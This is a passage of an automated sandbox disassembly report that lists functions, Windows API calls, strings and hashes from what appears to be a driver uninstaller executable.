                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetLastError.KERNEL32 ref: 00406404
                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00406429
                                  Strings
                                  • DUMMY_INSTANCEID, xrefs: 004062F4
                                  • Skipping RemoveDevice on device:%s, xrefs: 00406324
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DeviceSetup$InfoTime_fputs$DebugDestroyEnumErrorFormatInstanceLastListLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf_memset
                                  • String ID: DUMMY_INSTANCEID$Skipping RemoveDevice on device:%s
                                  • API String ID: 350280707-4007035523
                                  • Opcode ID: 11a532fb1f0488a462b27476f0d1274a4c488385db2c76606869d9c262f6d481
                                  • Instruction ID: 58558f0e97bab85485621576c09631b951488586262c0bb8074dd198c234a743
                                  • Opcode Fuzzy Hash: 11a532fb1f0488a462b27476f0d1274a4c488385db2c76606869d9c262f6d481
                                  • Instruction Fuzzy Hash: 923181B16083009FD310DF65D845BABB7F8AB88304F04493FF546A62C1EB78D944CBAA
                                  Function 00407D40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00407DAB
                                    • Part of subcall function 00407CD0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00407CF0
                                  • _memset.LIBCMT ref: 00407DD0
                                  • _sprintf.LIBCMT ref: 00407DEC
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  Strings
                                  • \\.\%c:, xrefs: 00407DA5
                                  • GetDrivePort: invalid number of arguments, xrefs: 00407E28
                                  • UninstCommandClass::GetDrivePort, xrefs: 00407D5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_sprintf$CreateDebugFileFormatLocalMutexObjectOutputReleaseSingleStringWait__output_l_fprintf_memset
                                  • String ID: GetDrivePort: invalid number of arguments$UninstCommandClass::GetDrivePort$\\.\%c:
                                  • API String ID: 2774027019-2205953287
                                  • Opcode ID: 28a69320c9b02a26f88811bb7a7a9d4ffec45549cc6371124c8268b7ff5ab03b
                                  • Instruction ID: 4ba337d747a65e611d7d3935feaafc048c45a43788c3819786f7ce5e4bc51a09
                                  • Opcode Fuzzy Hash: 28a69320c9b02a26f88811bb7a7a9d4ffec45549cc6371124c8268b7ff5ab03b
                                  • Instruction Fuzzy Hash: C721F9B260834066C220EB659886EEFB3D89F95704F00083FF585A72C1D678E54983EB
                                  Function 00406E20 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 63windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32 ref: 00406E88
                                  • SendMessageA.USER32(?,00001007,00000000,00000000), ref: 00406EBC
                                  Strings
                                  • Uninstall Title, xrefs: 00406E58
                                  • Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}, xrefs: 00406E4C
                                  • UninstCommandClass::AddNVUToListCallBack, xrefs: 00406E24
                                  • NVU File, xrefs: 00406E40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSendTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}$NVU File$UninstCommandClass::AddNVUToListCallBack$Uninstall Title
                                  • API String ID: 914171883-1011977421
                                  • Opcode ID: 510e40fbb7d5500b3de67f5dbfb1ab3ed12a8e2b426a47c57f0035809b7d71c2
                                  • Instruction ID: 68620c26e4e6f685bb2f9c375bbae31a74f6d59ad1b273723b5436e8f898767c
                                  • Opcode Fuzzy Hash: 510e40fbb7d5500b3de67f5dbfb1ab3ed12a8e2b426a47c57f0035809b7d71c2
                                  • Instruction Fuzzy Hash: 0911E3316043102BD200EA29CC52B9FB6D8AF85B18F10052EF984AB2D1D6B8DA1483DE
                                  Function 004023E0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00402435
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00402465
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CurrentDirectoryFullNamePath
                                  • String ID: CommandClass::NvSetCurrentDirectory(%s)$Current Script$Currentdir$NULL
                                  • API String ID: 2420862269-3919388351
                                  • Opcode ID: 3e1fad8f83e905ae93f631e21380ead5be3b3eef89decb44736e783e60087ec8
                                  • Instruction ID: b296ec5ebf30f4ef34560028d3eb22626e24a4272270e0f351e113c543dc25f4
                                  • Opcode Fuzzy Hash: 3e1fad8f83e905ae93f631e21380ead5be3b3eef89decb44736e783e60087ec8
                                  • Instruction Fuzzy Hash: 0E01C0712042006BD225EB15CC4AAFF779CEF98B54F44442EF589932C0DBB8984487EA
                                  Function 0040ED78 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                  • TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDB1
                                  • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040EDCC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressHandleModuleProc
                                  • String ID: DecodePointer$KERNEL32.DLL
                                  • API String ID: 1929421221-629428536
                                  • Opcode ID: 0920ecbc572d1951a1854ae827fd3cc81537ac5ea31b63488ade073c2a868e6c
                                  • Instruction ID: b6f61f00a5a17b2f849ea9c0d3824a7392a03a370c91f4fbecb373324e3441b5
                                  • Opcode Fuzzy Hash: 0920ecbc572d1951a1854ae827fd3cc81537ac5ea31b63488ade073c2a868e6c
                                  • Instruction Fuzzy Hash: 7FF09630210623ABC6216B26ED45B9B7EE4EF803A07484932F815E23F0CB38CD61D69D
                                  Function 0040ED01 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • TlsGetValue.KERNEL32(00000000,0040ED76,00000000,0041A430,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED0E
                                  • TlsGetValue.KERNEL32(00000006,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED25
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED3A
                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040ED55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressHandleModuleProc
                                  • String ID: EncodePointer$KERNEL32.DLL
                                  • API String ID: 1929421221-3682587211
                                  • Opcode ID: 14d77fd87a3c05b1f2b6ca2bb971299c2c8b04118980cd1abbc4cb1172e3224b
                                  • Instruction ID: 9388099ebb87417682be69e8aad88ca62cf5d841c5fb537139315c50ec7b4ff1
                                  • Opcode Fuzzy Hash: 14d77fd87a3c05b1f2b6ca2bb971299c2c8b04118980cd1abbc4cb1172e3224b
                                  • Instruction Fuzzy Hash: 82F09634600613EBC7215B36ED45A9B3BA4EF803507454D36F815E22F4DB38CD5286AD
                                  Function 00406670 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(NewDev.dll), ref: 00406683
                                  • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesA), ref: 00406695
                                  • FreeLibrary.KERNEL32(00000000), ref: 004066BE
                                  Strings
                                  • NewDev.dll, xrefs: 0040667E
                                  • UninstCommandClass::NvUpdateDriverForPlugAndPlayDevices, xrefs: 00406671
                                  • UpdateDriverForPlugAndPlayDevicesA, xrefs: 0040668F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugFormatFreeHandleLibraryLocalModuleMutexObjectOutputProcReleaseSingleStringWait_fprintf
                                  • String ID: NewDev.dll$UninstCommandClass::NvUpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevicesA
                                  • API String ID: 857855759-3259178646
                                  • Opcode ID: e975105f57365e9a871ccdf4e39655bb18749a52a7a741649d3cfcab1e795969
                                  • Instruction ID: d2fecb791eaaafa4930dbf0c9ff8637acece632a81e9df701defcd597306b453
                                  • Opcode Fuzzy Hash: e975105f57365e9a871ccdf4e39655bb18749a52a7a741649d3cfcab1e795969
                                  • Instruction Fuzzy Hash: 89F0ECB2A447016BC200DFA0BD04D9B37A99FE8B11B010928F406A2280CB28CD4486FF
                                  Function 00401B50 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401B62
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00401B6E
                                  • GetSystemDirectoryA.KERNEL32(?,?), ref: 00401B8F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugDirectoryFormatHandleLocalModuleMutexObjectOutputProcReleaseSingleStringSystemWait_fprintf
                                  • String ID: GetSystemWow64DirectoryA$NvGetSystemWow64Directory$kernel32.dll
                                  • API String ID: 610650337-4072825125
                                  • Opcode ID: 2e90b48ffb9796b8f3ed6577cbc11bc0f4312f4dcc375fb88848b854e7f4c949
                                  • Instruction ID: 349572422c6b12488303b510c6b629726889f342a9079dda8a3677e8d839015c
                                  • Opcode Fuzzy Hash: 2e90b48ffb9796b8f3ed6577cbc11bc0f4312f4dcc375fb88848b854e7f4c949
                                  • Instruction Fuzzy Hash: A4E080782403017FC500DB60DD49D5F7B69DBE8701B10851D754582150DB34D940DB9F
                                  Function 00402220 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 184COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __mbschr_l_memset
                                  • String ID: %s%s%s$%s{%s
                                  • API String ID: 1518400538-84299907
                                  • Opcode ID: ff4dbc0d703da98e77adcd814d3ddb32166ffde561b20d773eb87bd2f59c29c5
                                  • Instruction ID: 66237d527c184bb21662608c6de61099bff3a96f9006310b77b238e61c59510e
                                  • Opcode Fuzzy Hash: ff4dbc0d703da98e77adcd814d3ddb32166ffde561b20d773eb87bd2f59c29c5
                                  • Instruction Fuzzy Hash: CB5105733082041BD300AA6D9C55B97B7D9DFD9318F24857FF945E7392EA79D80882E8
                                  Function 00408640 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 126COMMON
                                  Download Yara Rule
                                  Strings
                                  • UninstCommandClass::SetRegistry(%s), xrefs: 0040864A
                                  • SetRegistry: failed to set %s\%s=%s, xrefs: 00408744
                                  • SetRegistry: cannot find '\', xrefs: 0040869D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __strdup$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: SetRegistry: cannot find '\'$SetRegistry: failed to set %s\%s=%s$UninstCommandClass::SetRegistry(%s)
                                  • API String ID: 3089866256-2079800986
                                  • Opcode ID: f3256fea8a8c9a4f2eca3e28be0cb130401290b621ea6ee4effb2fe9f49a2084
                                  • Instruction ID: b02ecfbaa18ad37b20d999f384c6ca90374e436a76cc69c128d9cafe8b28e8f5
                                  • Opcode Fuzzy Hash: f3256fea8a8c9a4f2eca3e28be0cb130401290b621ea6ee4effb2fe9f49a2084
                                  • Instruction Fuzzy Hash: 2631D9727403043BD210A5556C42F67B79CEBD4765F14083FFE48A62C2EA7EA90982F9
                                  Function 00406460 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
